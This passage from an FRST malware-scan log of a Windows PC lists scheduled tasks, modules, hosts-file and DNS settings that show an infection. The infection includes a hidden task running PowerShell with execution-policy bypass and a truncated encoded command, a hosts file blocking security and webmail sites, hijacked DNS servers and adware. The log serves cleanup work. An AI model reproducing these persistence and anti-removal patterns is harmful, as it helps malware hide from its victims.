CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB C9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.)

Task: {037C1E69-2352-4B71-BF9F-41F90E188F8F} - System32\Tasks\{B427AFCD-2507-455 E-962F-0A755643BDDC} => pcalua.exe -a C:\Users\REVERIEN\Downloads\setup_basic_48 00_14-5(1).exe -d C:\Users\REVERIEN\Downloads

Task: {06652989-4F08-4C22-9929-45FEAD589085} - System32\Tasks\{8B398634-E508-401 C-8F40-1E6B8018FAF9} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404

Task: {08F320F2-51C3-40FA-901E-6299F4ED245D} - System32\Tasks\Toshiba\CommonNoti fier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.e xe [2013-01-04] (Toshiba Europe GmbH)

Task: {1B3DA511-80EE-4124-9D8C-4214B6F9F7C7} - System32\Tasks\Trigger KMS Activa tion => C:\Program Files\KMSnano\TriggerKMS.exe [2013-01-26] ()

Task: {1B690D77-BED4-4BD3-87B3-77B30470B172} - System32\Tasks\{335127B4-0212-47B 8-A6F6-BB6DFEC8DC4C} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog rams\pdf-annotator-5.exe -d C:\Users\REVERIEN\Documents\Downloads\Programs

Task: {1C4D72AE-A136-44B9-AB6D-618DC414022A} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION

Task: {43142973-CF66-4C75-9A9C-BD86A7D56A2C} - System32\Tasks\{DE380E56-84B4-4F7 8-91DA-6FEB3482985D} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404

Task: {435AE71D-CBDE-4DDF-A504-6D7A8DC77019} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [201 6-03-24] (Adobe Systems Incorporated)

Task: {4754F53F-BCD6-4CEB-AE31-E3D1081F2919} - System32\Tasks\RealDownloader Upd ate Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2016-02-03] ()

Task: {4899038C-645F-4F99-B06E-C6C53E90E8E8} - System32\Tasks\GoogleUpdateTaskUs erS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\L ocal\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)

Task: {4D2B6648-C88F-42D0-801A-2BC13B0D4419} - System32\Tasks\Microsoft\Windows\ Setup\8.1 auto install ping => C:\Windows\system32\AutoUpdate.exe

Task: {52FC6D96-0F79-4D7F-9016-C45F51E68844} - System32\Tasks\{B4A54807-95C1-4C5 6-AD99-3A2CF5B1A653} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog rams\setup_basic_4800_14-5_2.exe -d C:\Users\REVERIEN\AppData\Roaming\IDM

Task: {57B2A906-6471-42D9-813A-6ECC1BB8FE03} - System32\Tasks\Microsoft\Windows\ RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-15] (Microsoft Corpo ration)

Task: {620EA6A0-7874-4884-8744-C548E5709A0F} - System32\Tasks\Microsoft\Office\O fficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)

Task: {698FBBBE-2414-4D8D-8C84-3409AD2E7EE0} - System32\Tasks\RealDownloaderReal UpgradeLogonTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program File s (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks, Inc.)

Task: {7194F166-8483-4E63-B348-4665129E173B} - System32\Tasks\Microsoft\Windows\ Setup\8.1 auto install v2 => C:\WINDOWS\system32\AutoUpdate.exe

Task: {71B218C2-3599-478E-A2FD-5AD8943CB636} - System32\Tasks\{B7687898-7A46-489 6-A5EA-EF2E5B2F59D6} => pcalua.exe -a G:\RRutayis\Pavilion\Softwares\setup_basic _4800.exe -d G:\RRutayis\Pavilion\Softwares

(9)

Task: {7224D3F7-19A1-42EC-BECA-439673C57A55} - System32\Tasks\Microsoft\Office\O ffice 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Share d\Office15\OLicenseHeartbeat.exe

Task: {74DE945E-A8A9-46D9-B7C6-43D6200BA2FF} - System32\Tasks\AutoKMS => C:\WIND OWS\AutoKMS\AutoKMS.exe [2016-04-02] ()

Task: {7D852E04-7098-426F-97C2-C15FEBB19066} - System32\Tasks\{E0A32E87-8F44-4B7 3-8A8D-7619716B55C8} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404

Task: {86BE8531-BCDB-49B1-BB53-F1B51B1F2651} - System32\Tasks\Microsoft\Office\O fficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia. exe [2014-01-22] (Microsoft Corporation)

Task: {86F486B0-1990-4CFA-8DC2-329407DD0A02} - System32\Tasks\DropboxUpdateTaskU serS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppDat a\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)

Task: {872982BD-00DC-422F-B1CE-6E49E2B5AB8D} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe

Task: {8FE78DF6-0309-4FB0-B487-BF13C767D48D} - System32\Tasks\DNSWALTERS => C:\P rogram Files (x86)\DNS Unlocker\dnswalters.exe [2016-02-28] () <==== ATTENTION Task: {9A470131-2390-407D-92E7-6C23D45E2A43} - System32\Tasks\RealDownloaderReal UpgradeScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetwor ks, Inc.)

Task: {9FA8A24B-5779-4D13-ABBD-0AEA47FDA1C1} - System32\Tasks\Apple\AppleSoftwar eUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015 -08-27] (Apple Inc.)

Task: {A6597B70-BC68-4E4E-9418-E07ADAB6CD49} - System32\Tasks\TOSHIBA\Service St ation => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation. exe [2012-07-27] (TOSHIBA Corporation)

Task: {A6A1D5E0-2A0D-4605-8355-ED76B01EE13A} - System32\Tasks\GoogleUpdateTaskMa chineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (G oogle Inc.)

Task: {A7B29358-293E-4C2F-B46F-0E6B97C3127C} - System32\Tasks\MySQLNotifierTask => C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [2014-09-03 ] (Oracle Corporation)

Task: {B00C6F1F-19F7-4CC1-9F4F-90B9FCC800B9} - System32\Tasks\GoogleUpdateTaskUs erS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData \Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)

Task: {B03DB1DA-0393-410C-AA42-6251752AE6FD} - System32\Tasks\MySQL\Installer\Ma nifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLIn stallerConsole.exe [2015-08-20] (Oracle Corporation)

Task: {BFE355E8-32FA-4BD6-A3F7-D792E36D5785} - System32\Tasks\DropboxUpdateTaskU serS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\ Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)

Task: {C238B4A8-4D88-4DDD-B77A-77590C626E69} - System32\Tasks\{2574E1B5-210F-414 9-B661-A7C1B5BE2AEC} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404

Task: {D96737D8-8E0D-49DB-9B1D-DABEBEB00626} - System32\Tasks\{0E0E7947-0D0D-090 5-0D11-0D087A0D110A} => powershell.exe -nologo -executionpolicy bypass -noninter active -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByA GUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDA G8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzA GMAOwAkAFAAcgBvAGcA (the data entry has 9416 more characters).

Task: {DA4CFD73-5939-4F16-A5D5-2F25F0354A4E} - System32\Tasks\{71C07501-74AE-CA4 7-A919-ECBA39E73D0C} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)

Task: {DF2B3ACD-B3A9-44E0-A1F7-78CFF05EE2E5} - System32\Tasks\{D2750D47-E820-40A 5-94CA-A5BAEEC0E056} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404

Task: {DF39BBDD-F0B3-4FAD-ABF1-F2A8B63CA7CC} - System32\Tasks\GoogleUpdateTaskMa chineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18]

(10)

(Google Inc.)

Task: {F22B8338-9644-4660-BE5D-D422066ECD42} - System32\Tasks\RealDownloaderDown loaderScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program F iles (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2016-02-03] (RealNe tworks, Inc.)

Task: {F29AEFCF-3872-459A-BE83-E74679F989F2} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-08-19] (Reimage®) <= === ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Mac romed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736 1095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdat e.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736 1095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate. exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86) \Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\G oogle\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361 095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.e xe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361 095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\S ynaptics\SynTP\SynTPEnh.exe

Task: C:\WINDOWS\Tasks\WebReg .job => C:\Program Files (x86)\HP\Digital Imaging\ bin\hpqwrg.exe

==================== Shortcuts ============================= (The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Public\Desktop\Quantum GIS Desktop (1.8.0).lnk -> C:\Program Files (x86)\Quantum GIS Lisboa\bin\nircmd.exe (NirSoft) -> exec hide "C:\Program Files (x86)\Quantum GIS Lisboa\bin\qgis.bat"

==================== Loaded Modules (Whitelisted) ==============

2011-10-13 15:38 - 2011-10-13 15:38 - 00156672 _____ () C:\Program Files (x86)\T OSHIBA\Password Utility\GFNEXSrv.exe 2014-12-24 17:10 - 2014-08-06 03:04 - 01441792 _____ () C:\Program Files\Everyth ing\Everything.exe 2016-03-11 20:25 - 2013-11-15 14:38 - 00066048 _____ () C:\Program Files (x86)\R EALTEK\Realtek Bluetooth\BTDevMgr.exe 2015-09-18 17:53 - 2015-09-18 17:53 - 13067264 _____ () C:\Program Files\MySQL\M ySQL Server 5.6\bin\mysqld.exe

2016-02-03 18:49 - 2016-02-03 18:49 - 00032544 _____ () C:\Program Files (x86)\R eal\UpdateService\RealPlayerUpdateSvc.exe 2015-08-19 10:56 - 2015-08-19 10:56 - 06908904 _____ () C:\Program Files\Reimage \Reimage Protector\ReiSystem.exe 2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism3 2k.dll 2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\system32\Core UIComponents.dll

(11)

2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\System32\Core UIComponents.dll 2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files\Microso ft Office\Office15\1033\GrooveIntlResource.dll 2016-01-05 11:44 - 2015-12-07 06:14 - 00093696 _____ () C:\Windows\SystemApps\Sh ellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-03-02 19:05 - 2016-02-23 10:36 - 00472064 _____ () C:\Windows\SystemApps\Sh ellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2015-10-21 10:47 - 2007-07-18 16:15 - 00020480 _____ () C:\Windows\System32\spoo l\drivers\x64\3\WrtMon.exe 2016-02-08 22:38 - 2016-02-08 22:38 - 01110048 _____ () C:\Users\REVERIEN\AppDat a\Local\MalwareProtectionLive\MalwareProtectionClient.exe 2016-03-16 12:25 - 2016-02-28 11:46 - 00678912 _____ () C:\Program Files (x86)\D NS Unlocker\dnswalters.exe 2016-02-02 09:38 - 2016-02-03 11:58 - 00144384 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2016-03-29 22:12 - 2016-03-31 10:07 - 00016896 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos .exe 2016-03-29 22:12 - 2016-03-31 10:07 - 17535488 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos .dll 2016-03-04 12:16 - 2016-03-04 12:16 - 00291328 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromo tion.dll 2015-04-08 13:39 - 2015-04-08 13:39 - 00468480 _____ () C:\Program Files (x86)\M endeley Desktop\MendeleyWordPlugin.exe 2016-02-03 18:00 - 2016-02-03 18:00 - 00712432 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\downloader2.exe 2016-01-13 13:53 - 2016-01-05 03:29 - 07992832 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-01-13 13:53 - 2016-01-05 03:23 - 00591360 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-02-03 16:21 - 2016-01-16 07:10 - 02483200 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-02-03 16:21 - 2016-01-16 07:13 - 04089856 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-02-03 18:48 - 2016-02-03 18:48 - 00037688 _____ () C:\Program Files (x86)\R eal\UpdateService\DL2UpdatePlugin.dll 2016-02-03 18:48 - 2016-02-03 18:48 - 00039224 _____ () C:\Program Files (x86)\R eal\UpdateService\RealDownloaderUpdatePlugin.dll 2016-02-03 18:49 - 2016-02-03 18:49 - 00037192 _____ () C:\Program Files (x86)\R eal\UpdateService\VideoDLUpdatePlugin.dll

2013-03-28 07:14 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\I ntel\Intel(R) Management Engine Components\UNS\ACE.dll

2016-02-03 18:00 - 2016-02-03 18:00 - 00077552 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\dtvhooks.dll 2016-02-29 20:12 - 2016-02-29 20:12 - 00089328 _____ () c:\program files (x86)\r eal\realplayer\CrashRpt\CrashRpt1402.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00022288 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\mediautil.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 04274960 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avcodec-55.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 01520912 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avformat-55.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00322832 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avutil-52.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00098816 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32api.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00110080 _____ () C:\Users\REVERIEN\AppDat

(12)

a\Local\Temp\_MEI56922\pywintypes27.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00364544 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pythoncom27.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00320512 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32com.shell.shell.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00776704 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_hashlib.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 01176576 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._core_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00806400 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._gdi_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00816128 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._windows_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 01067008 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._controls_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00733184 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._misc_.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00682496 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pysqlite2._sqlite.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_ctypes.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00119808 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32file.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00108544 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32security.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00007168 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\hashobjs_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00017920 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\thumbnails_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\usb_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00167936 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32gui.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00018432 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32event.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00046080 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_socket.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 01208320 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_ssl.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00128512 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_elementtree.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00127488 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pyexpat.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00013824 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\common.time34.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00038912 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32inet.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00036864 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_psutil_windows.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00525208 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\windows._lib_cacheinvalidation.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00011264 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32crypt.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00077312 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._html2.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00027136 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_multiprocessing.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00020480 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_yappi.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00035840 _____ () C:\Users\REVERIEN\AppDat

(13)

a\Local\Temp\_MEI56922\win32process.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00686080 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\unicodedata.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00078848 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._animate.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00123392 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._wizard.pyd 2016-04-06 09:29 - 2016-04-06 09:30 - 00024064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32pipe.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00010240 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\select.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00025600 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32pdh.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00017408 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32profile.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00022528 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32ts.pyd 2016-02-02 09:38 - 2016-02-03 11:58 - 00141312 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dl l 2016-02-02 09:38 - 2016-02-03 11:58 - 22330368 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files (x86)\M icrosoft Office\Office15\1033\GrooveIntlResource.dll 2015-04-08 13:38 - 2015-04-08 13:38 - 00471040 _____ () C:\Program Files (x86)\M endeley Desktop\Mendeley.dll 2016-02-03 17:53 - 2016-02-03 17:53 - 01382048 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\cpprest100_1_2.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00654608 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Lib\r1api.dll 2016-02-03 17:53 - 2016-02-03 17:53 - 06242107 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\videodl.exe

==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\anwlblhj.sys:changelist [4642] AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [145]

AlternateDataStreams: C:\ProgramData\TEMP:5C1D8A71 [138] AlternateDataStreams: C:\ProgramData\TEMP:661DFA1C [117] AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [286]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. T he "AlternateShell" will be restored.)

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to d efault or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\partition

(14)

guru.com -> hxxp://www.partitionguru.com

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2012-07-26 07:26 - 2016-04-02 20:18 - 00011672 ____A C:\WINDOWS\system32\Drivers \etc\hosts 199.59.62.24 www.malwaretips.com 199.59.62.24 malwareremovalguides.info 199.59.62.24 onlinevirusrepair.com 199.59.62.24 enigmasoftware.com 199.59.62.24 pcrisk.com 199.59.62.24 malwarebytes.org/ 199.59.62.24 tomshardware.co.uk 199.59.62.24 malwaretips.com 199.59.62.24 answers.yahoo.com 199.59.62.24 www.malwareremovalguides.info 199.59.62.24 www.onlinevirusrepair.com 199.59.62.24 www.enigmasoftware.com 199.59.62.24 www.pcrisk.com 199.59.62.24 guides.yoosecurity.com 199.59.62.24 www.malwarebytes.org/ 199.59.62.24 www.tomshardware.co.uk 199.59.62.24 www.gmail.com 199.59.62.24 gmail.com 199.59.62.24 www.hotmail.com 199.59.62.24 hotmail.com 199.59.62.24 www.mail.ru 199.59.62.24 mail.ru 199.59.62.24 www.torrentz.eu 199.59.62.24 torrentz.eu 199.59.62.24 www.kat.ph 199.59.62.24 kat.ph 199.59.62.24 www.thepiratebay.se 199.59.62.24 thepiratebay.se 199.59.62.24 www.thepiratebay.org 199.59.62.24 thepiratebay.org There are 356 more lines.

==================== Other Areas ============================ (Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\Control Panel\Desktop\\Wallpap er -> C:\Users\REVERIEN\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\ DesktopBackground\img0.jpg HKU\S-1-5-21-1240968423-981972810-3087361095-501\Control Panel\Desktop\\Wallpape r -> C:\WINDOWS\web\wallpaper\Toshiba\standard.jpg DNS Servers: 82.163.143.171 - 82.163.142.173 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPrompt BehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.)

(15)

HKLM\...\StartupApproved\Run: => "Everything" HKLM\...\StartupApproved\Run: => "HotKeysCmds" HKLM\...\StartupApproved\Run: => "IgfxTray" HKLM\...\StartupApproved\Run: => "Persistence" HKLM\...\StartupApproved\Run: => "RtHDVCpl" HKLM\...\StartupApproved\Run: => "TecoResident"

HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD" HKLM\...\StartupApproved\Run: => "TCrdMain" HKLM\...\StartupApproved\Run: => "TODDMain" HKLM\...\StartupApproved\Run: => "TosWaitSrv" HKLM\...\StartupApproved\Run32: => "autodetect" HKLM\...\StartupApproved\Run32: => "Everything" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "RIMBBLaunchAgent.exe" HKLM\...\StartupApproved\Run32: => "TPUReg" HKLM\...\StartupApproved\Run32: => "APSDaemon" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\StartupFol der: => "Dropbox.lnk" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "G oogle Update" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "I DMan" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S kype" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S creencast-O-Matic Tray" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "V See" ==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139

FirewallRules: [{CED17A21-3FAE-49CF-9ECA-A918423B2CBF}] => (Allow) %systemroot%\ system32\alg.exe

